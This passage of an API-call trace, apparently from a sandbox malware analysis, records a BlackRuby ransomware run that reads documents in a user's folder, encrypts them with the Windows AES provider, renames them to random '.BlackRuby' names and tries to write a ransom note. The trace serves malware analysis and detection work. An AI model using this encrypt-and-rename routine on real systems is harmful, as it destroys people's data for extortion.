S34rAWZEOKV.rtf" (normalized: "c:\\users\\eebsym5\\documents\\fs5l5p s34rawzeokv.rtf"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8212fa60, ftCreationTime.dwHighDateTime=0x1d35266, ftLastAccessTime.dwLowDateTime=0x8247d5e0, ftLastAccessTime.dwHighDateTime=0x1d34beb, ftLastWriteTime.dwLowDateTime=0x8247d5e0, ftLastWriteTime.dwHighDateTime=0x1d34beb, nFileSizeHigh=0x0, nFileSizeLow=0x10f53)) returned 1 [0057.775] GetLastError () returned 0x0 [0057.775] SetErrorMode (uMode=0x0) returned 0x1 [0057.775] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c818) returned 1 [0057.775] GetLastError () returned 0x0 [0057.809] CryptImportKey (in: hProv=0x37c818, pbData=0x1c07030, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360ae0) returned 1 [0057.809] GetLastError () returned 0x0 [0057.809] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.809] GetLastError () returned 0x0 [0057.814] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.814] GetLastError () returned 0x0 [0057.814] CryptDuplicateKey (in: hKey=0x360ae0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360d20) returned 1 [0057.814] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.814] GetLastError () returned 0x0 [0057.814] CryptSetKeyParam (hKey=0x360d20, dwParam=0x4, pbData=0x1c3407c*=0x1, dwFlags=0x0) returned 1 [0057.814] GetLastError () returned 0x0 [0057.814] CryptSetKeyParam (hKey=0x360d20, dwParam=0x1, pbData=0x1c34048, dwFlags=0x0) returned 1 [0057.814] GetLastError () returned 0x0 [0057.814] CryptEncrypt (in: hKey=0x360d20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c340c4*, pdwDataLen=0x18ed74*=0x11050, dwBufLen=0x11050 | out: pbData=0x1c340c4*, pdwDataLen=0x18ed74*=0x11050) returned 1 [0057.815] GetLastError () returned 0x0 [0057.815] CryptEncrypt (in: hKey=0x360d20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c56190*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1c56190*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0057.815] GetLastError () returned 0x0 [0057.815] CryptEncrypt (in: hKey=0x360d20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c561c0*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1c561c0*, pdwDataLen=0x18ed94*=0x10) returned 1 [0057.815] GetLastError () returned 0x0 [0057.816] CryptDestroyKey (hKey=0x360ae0) returned 1 [0057.816] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0057.816] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0057.816] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\fs5l5p S34rAWZEOKV.rtf", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\fs5l5p S34rAWZEOKV.rtf", lpFilePart=0x0) returned 0x31 [0057.816] GetLastError () returned 0x0 [0057.816] SetErrorMode (uMode=0x1) returned 0x0 [0057.816] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\fs5l5p S34rAWZEOKV.rtf" (normalized: "c:\\users\\eebsym5\\documents\\fs5l5p s34rawzeokv.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.817] GetLastError () returned 0xb7 [0057.817] GetFileType (hFile=0x184) returned 0x1 [0057.817] SetErrorMode (uMode=0x0) returned 0x1 [0057.817] GetFileType (hFile=0x184) returned 0x1 [0057.819] CloseHandle (hObject=0x184) returned 1 [0057.819] GetLastError () returned 0xb7 [0057.819] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\fs5l5p S34rAWZEOKV.rtf", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\fs5l5p S34rAWZEOKV.rtf", lpFilePart=0x0) returned 0x31 [0057.819] GetLastError () returned 0xb7 [0057.819] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Encrypted_E2Fq9rpJxqdnRMvU3rW0dYxExkjH76ie5Uz0.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Encrypted_E2Fq9rpJxqdnRMvU3rW0dYxExkjH76ie5Uz0.BlackRuby", lpFilePart=0x0) returned 0x53 [0057.819] GetLastError () returned 0xb7 [0057.819] SetErrorMode (uMode=0x1) returned 0x0 [0057.819] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\fs5l5p S34rAWZEOKV.rtf" (normalized: "c:\\users\\eebsym5\\documents\\fs5l5p s34rawzeokv.rtf"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8212fa60, ftCreationTime.dwHighDateTime=0x1d35266, ftLastAccessTime.dwLowDateTime=0x8247d5e0, ftLastAccessTime.dwHighDateTime=0x1d34beb, ftLastWriteTime.dwLowDateTime=0x2aa8d920, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x11060)) returned 1 [0057.819] GetLastError () returned 0xb7 [0057.819] SetErrorMode (uMode=0x0) returned 0x1 [0057.819] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\fs5l5p S34rAWZEOKV.rtf" (normalized: "c:\\users\\eebsym5\\documents\\fs5l5p s34rawzeokv.rtf"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Encrypted_E2Fq9rpJxqdnRMvU3rW0dYxExkjH76ie5Uz0.BlackRuby" (normalized: "c:\\users\\eebsym5\\documents\\encrypted_e2fq9rpjxqdnrmvu3rw0dyxexkjh76ie5uz0.blackruby")) returned 1 [0057.820] GetLastError () returned 0xb7 [0057.820] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x33 [0057.820] GetLastError () returned 0xb7 [0057.820] SetErrorMode (uMode=0x1) returned 0x0 [0057.820] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0057.820] GetLastError () returned 0x5 [0057.821] SetErrorMode (uMode=0x0) returned 0x1 [0057.821] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\kAr-F.xlsx", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\kAr-F.xlsx", lpFilePart=0x0) returned 0x25 [0057.821] GetLastError () returned 0x5 [0057.821] SetErrorMode (uMode=0x1) returned 0x0 [0057.821] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\kAr-F.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\kar-f.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x1c84350 | out: lpFileInformation=0x1c84350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11cf3970, ftCreationTime.dwHighDateTime=0x1d36e87, ftLastAccessTime.dwLowDateTime=0xf30a3d60, ftLastAccessTime.dwHighDateTime=0x1d34e6e, ftLastWriteTime.dwLowDateTime=0xf30a3d60, ftLastWriteTime.dwHighDateTime=0x1d34e6e, nFileSizeHigh=0x0, nFileSizeLow=0xa5b)) returned 1 [0057.821] GetLastError () returned 0x5 [0057.821] SetErrorMode (uMode=0x0) returned 0x1 [0057.821] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\kAr-F.xlsx", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\kAr-F.xlsx", lpFilePart=0x0) returned 0x25 [0057.821] GetLastError () returned 0x5 [0057.821] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\kAr-F.xlsx", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\kAr-F.xlsx", lpFilePart=0x0) returned 0x25 [0057.821] GetLastError () returned 0x5 [0057.821] SetErrorMode (uMode=0x1) returned 0x0 [0057.822] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\kAr-F.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\kar-f.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.822] GetLastError () returned 0x0 [0057.822] GetFileType (hFile=0x184) returned 0x1 [0057.822] SetErrorMode (uMode=0x0) returned 0x1 [0057.822] GetFileType (hFile=0x184) returned 0x1 [0057.822] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0xa5b [0057.822] GetLastError () returned 0x0 [0057.822] ReadFile (in: hFile=0x184, lpBuffer=0x1c86b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1c86b48*, lpNumberOfBytesRead=0x18ed84*=0xa5b, lpOverlapped=0x0) returned 1 [0057.822] GetLastError () returned 0x0 [0057.822] CloseHandle (hObject=0x184) returned 1 [0057.823] GetLastError () returned 0x0 [0057.823] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\kAr-F.xlsx", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\kAr-F.xlsx", lpFilePart=0x0) returned 0x25 [0057.823] GetLastError () returned 0x0 [0057.823] SetErrorMode (uMode=0x1) returned 0x0 [0057.823] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\kAr-F.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\kar-f.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11cf3970, ftCreationTime.dwHighDateTime=0x1d36e87, ftLastAccessTime.dwLowDateTime=0xf30a3d60, ftLastAccessTime.dwHighDateTime=0x1d34e6e, ftLastWriteTime.dwLowDateTime=0xf30a3d60, ftLastWriteTime.dwHighDateTime=0x1d34e6e, nFileSizeHigh=0x0, nFileSizeLow=0xa5b)) returned 1 [0057.823] GetLastError () returned 0x0 [0057.823] SetErrorMode (uMode=0x0) returned 0x1 [0057.833] CryptImportKey (in: hProv=0x37c790, pbData=0x1ce2934, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360da0) returned 1 [0057.833] GetLastError () returned 0x0 [0057.833] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.833] GetLastError () returned 0x0 [0057.838] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.838] GetLastError () returned 0x0 [0057.838] CryptDuplicateKey (in: hKey=0x360da0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360ee0) returned 1 [0057.838] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.838] GetLastError () returned 0x0 [0057.838] CryptSetKeyParam (hKey=0x360ee0, dwParam=0x4, pbData=0x1d0f980*=0x1, dwFlags=0x0) returned 1 [0057.838] GetLastError () returned 0x0 [0057.838] CryptSetKeyParam (hKey=0x360ee0, dwParam=0x1, pbData=0x1d0f94c, dwFlags=0x0) returned 1 [0057.838] GetLastError () returned 0x0 [0057.838] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d0f9c8*, pdwDataLen=0x18ed74*=0xb50, dwBufLen=0xb50 | out: pbData=0x1d0f9c8*, pdwDataLen=0x18ed74*=0xb50) returned 1 [0057.838] GetLastError () returned 0x0 [0057.839] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d11094*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1d11094*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0057.839] GetLastError () returned 0x0 [0057.839] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d110c4*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1d110c4*, pdwDataLen=0x18ed94*=0x10) returned 1 [0057.839] GetLastError () returned 0x0 [0057.839] CryptDestroyKey (hKey=0x360da0) returned 1 [0057.839] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0057.839] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0057.839] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\kAr-F.xlsx", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\kAr-F.xlsx", lpFilePart=0x0) returned 0x25 [0057.839] GetLastError () returned 0x0 [0057.839] SetErrorMode (uMode=0x1) returned 0x0 [0057.840] GetFileType (hFile=0x184) returned 0x1 [0057.840] SetErrorMode (uMode=0x0) returned 0x1 [0057.840] GetFileType (hFile=0x184) returned 0x1 [0057.840] WriteFile (in: hFile=0x184, lpBuffer=0x1d134ec*, nNumberOfBytesToWrite=0xb60, lpNumberOfBytesWritten=0x18ed58, lpOverlapped=0x0 | out: lpBuffer=0x1d134ec*, lpNumberOfBytesWritten=0x18ed58*=0xb60, lpOverlapped=0x0) returned 1 [0057.841] GetLastError () returned 0xb7 [0057.841] CloseHandle (hObject=0x184) returned 1 [0057.841] GetLastError () returned 0xb7 [0057.841] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\kAr-F.xlsx", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\kAr-F.xlsx", lpFilePart=0x0) returned 0x25 [0057.841] GetLastError () returned 0xb7 [0057.841] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Encrypted_2sH4DuP9HTK7tGGFA8iOAUNpBArGxR6YFt36xi7muxz.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Encrypted_2sH4DuP9HTK7tGGFA8iOAUNpBArGxR6YFt36xi7muxz.BlackRuby", lpFilePart=0x0) returned 0x5a [0057.841] GetLastError () returned 0xb7 [0057.841] SetErrorMode (uMode=0x1) returned 0x0 [0057.841] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\kAr-F.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\kar-f.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11cf3970, ftCreationTime.dwHighDateTime=0x1d36e87, ftLastAccessTime.dwLowDateTime=0xf30a3d60, ftLastAccessTime.dwHighDateTime=0x1d34e6e, ftLastWriteTime.dwLowDateTime=0x2aab3a80, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xb60)) returned 1 [0057.841] GetLastError () returned 0xb7 [0057.841] SetErrorMode (uMode=0x0) returned 0x1 [0057.841] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\kAr-F.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\kar-f.xlsx"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Encrypted_2sH4DuP9HTK7tGGFA8iOAUNpBArGxR6YFt36xi7muxz.BlackRuby" (normalized: "c:\\users\\eebsym5\\documents\\encrypted_2sh4dup9htk7tggfa8ioaunpbargxr6yft36xi7muxz.blackruby")) returned 1 [0057.841] GetLastError () returned 0xb7 [0057.842] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x33 [0057.842] GetLastError () returned 0xb7 [0057.842] SetErrorMode (uMode=0x1) returned 0x0 [0057.842] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0057.842] GetLastError () returned 0x5 [0057.844] SetErrorMode (uMode=0x0) returned 0x1 [0057.844] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\KU_yMG3le-eXPA-oqspc.pptx", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\KU_yMG3le-eXPA-oqspc.pptx", lpFilePart=0x0) returned 0x34 [0057.844] GetLastError () returned 0x5 [0057.844] SetErrorMode (uMode=0x1) returned 0x0 [0057.844] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\KU_yMG3le-eXPA-oqspc.pptx" (normalized: "c:\\users\\eebsym5\\documents\\ku_ymg3le-expa-oqspc.pptx"), fInfoLevelId=0x0, lpFileInformation=0x1d313cc | out: lpFileInformation=0x1d313cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e7065b0, ftCreationTime.dwHighDateTime=0x1d34d3e, ftLastAccessTime.dwLowDateTime=0xf5a5b8e0, ftLastAccessTime.dwHighDateTime=0x1d3622f, ftLastWriteTime.dwLowDateTime=0xf5a5b8e0, ftLastWriteTime.dwHighDateTime=0x1d3622f, nFileSizeHigh=0x0, nFileSizeLow=0xb27e)) returned 1 [0057.844] GetLastError () returned 0x5 [0057.844] SetErrorMode (uMode=0x0) returned 0x1 [0057.845] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\KU_yMG3le-eXPA-oqspc.pptx", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\KU_yMG3le-eXPA-oqspc.pptx", lpFilePart=0x0) returned 0x34 [0057.845] GetLastError () returned 0x5 [0057.845] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\KU_yMG3le-eXPA-oqspc.pptx", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\KU_yMG3le-eXPA-oqspc.pptx", lpFilePart=0x0) returned 0x34 [0057.845] GetLastError () returned 0x5 [0057.845] SetErrorMode (uMode=0x1) returned 0x0 [0057.845] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\KU_yMG3le-eXPA-oqspc.pptx" (normalized: "c:\\users\\eebsym5\\documents\\ku_ymg3le-expa-oqspc.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.845] GetLastError () returned 0x0 [0057.845] GetFileType (hFile=0x184) returned 0x1 [0057.845] SetErrorMode (uMode=0x0) returned 0x1 [0057.845] GetFileType (hFile=0x184) returned 0x1 [0057.845] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0xb27e [0057.845] GetLastError () returned 0x0 [0057.845] ReadFile (in: hFile=0x184, lpBuffer=0x1d33130, nNumberOfBytesToRead=0xb27e, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1d33130*, lpNumberOfBytesRead=0x18ed84*=0xb27e, lpOverlapped=0x0) returned 1 [0057.846] GetLastError () returned 0x0 [0057.846] CloseHandle (hObject=0x184) returned 1 [0057.846] GetLastError () returned 0x0 [0057.847] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\KU_yMG3le-eXPA-oqspc.pptx", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\KU_yMG3le-eXPA-oqspc.pptx", lpFilePart=0x0) returned 0x34 [0057.847] GetLastError () returned 0x0 [0057.847] SetErrorMode (uMode=0x1) returned 0x0 [0057.847] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\KU_yMG3le-eXPA-oqspc.pptx" (normalized: "c:\\users\\eebsym5\\documents\\ku_ymg3le-expa-oqspc.pptx"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e7065b0, ftCreationTime.dwHighDateTime=0x1d34d3e, ftLastAccessTime.dwLowDateTime=0xf5a5b8e0, ftLastAccessTime.dwHighDateTime=0x1d3622f, ftLastWriteTime.dwLowDateTime=0xf5a5b8e0, ftLastWriteTime.dwHighDateTime=0x1d3622f, nFileSizeHigh=0x0, nFileSizeLow=0xb27e)) returned 1 [0057.847] GetLastError () returned 0x0 [0057.847] SetErrorMode (uMode=0x0) returned 0x1 [0057.847] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c680) returned 1 [0057.847] GetLastError () returned 0x0 [0057.885] CryptImportKey (in: hProv=0x37c680, pbData=0x1b9c3b0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360f60) returned 1 [0057.885] GetLastError () returned 0x0 [0057.885] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.885] GetLastError () returned 0x0 [0057.890] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.890] GetLastError () returned 0x0 [0057.890] CryptDuplicateKey (in: hKey=0x360f60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360b20) returned 1 [0057.891] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.891] GetLastError () returned 0x0 [0057.891] CryptSetKeyParam (hKey=0x360b20, dwParam=0x4, pbData=0x1bc93fc*=0x1, dwFlags=0x0) returned 1 [0057.891] GetLastError () returned 0x0 [0057.891] CryptSetKeyParam (hKey=0x360b20, dwParam=0x1, pbData=0x1bc93c8, dwFlags=0x0) returned 1 [0057.891] GetLastError () returned 0x0 [0057.891] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bc9444*, pdwDataLen=0x18ed74*=0xb370, dwBufLen=0xb370 | out: pbData=0x1bc9444*, pdwDataLen=0x18ed74*=0xb370) returned 1 [0057.891] GetLastError () returned 0x0 [0057.891] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bdfb50*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1bdfb50*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0057.891] GetLastError () returned 0x0 [0057.891] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bdfb80*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1bdfb80*, pdwDataLen=0x18ed94*=0x10) returned 1 [0057.891] GetLastError () returned 0x0 [0057.892] CryptDestroyKey (hKey=0x360f60) returned 1 [0057.892] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0057.892] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0057.892] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\KU_yMG3le-eXPA-oqspc.pptx", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\KU_yMG3le-eXPA-oqspc.pptx", lpFilePart=0x0) returned 0x34 [0057.892] GetLastError () returned 0x0 [0057.892] SetErrorMode (uMode=0x1) returned 0x0 [0057.892] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\KU_yMG3le-eXPA-oqspc.pptx" (normalized: "c:\\users\\eebsym5\\documents\\ku_ymg3le-expa-oqspc.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.893] GetLastError () returned 0xb7 [0057.893] GetFileType (hFile=0x184) returned 0x1 [0057.893] SetErrorMode (uMode=0x0) returned 0x1 [0057.893] GetFileType (hFile=0x184) returned 0x1 [0057.895] CloseHandle (hObject=0x184) returned 1 [0057.895] GetLastError () returned 0xb7 [0057.895] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\KU_yMG3le-eXPA-oqspc.pptx", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\KU_yMG3le-eXPA-oqspc.pptx", lpFilePart=0x0) returned 0x34 [0057.895] GetLastError () returned 0xb7 [0057.895] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Encrypted_QMUpKdvzoW3PhldYTXWOq3cJp40P3y3ad9gVBHcI5.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Encrypted_QMUpKdvzoW3PhldYTXWOq3cJp40P3y3ad9gVBHcI5.BlackRuby", lpFilePart=0x0) returned 0x58 [0057.895] GetLastError () returned 0xb7 [0057.895] SetErrorMode (uMode=0x1) returned 0x0 [0057.895] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\KU_yMG3le-eXPA-oqspc.pptx" (normalized: "c:\\users\\eebsym5\\documents\\ku_ymg3le-expa-oqspc.pptx"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e7065b0, ftCreationTime.dwHighDateTime=0x1d34d3e, ftLastAccessTime.dwLowDateTime=0xf5a5b8e0, ftLastAccessTime.dwHighDateTime=0x1d3622f, ftLastWriteTime.dwLowDateTime=0x2ab4c000, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xb380)) returned 1 [0057.895] GetLastError () returned 0xb7 [0057.895] SetErrorMode (uMode=0x0) returned 0x1 [0057.895] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\KU_yMG3le-eXPA-oqspc.pptx" (normalized: "c:\\users\\eebsym5\\documents\\ku_ymg3le-expa-oqspc.pptx"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Encrypted_QMUpKdvzoW3PhldYTXWOq3cJp40P3y3ad9gVBHcI5.BlackRuby" (normalized: "c:\\users\\eebsym5\\documents\\encrypted_qmupkdvzow3phldytxwoq3cjp40p3y3ad9gvbhci5.blackruby")) returned 1 [0057.896] GetLastError () returned 0xb7 [0057.896] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x33 [0057.896] GetLastError () returned 0xb7 [0057.896] SetErrorMode (uMode=0x1) returned 0x0 [0057.896] CreateFileW 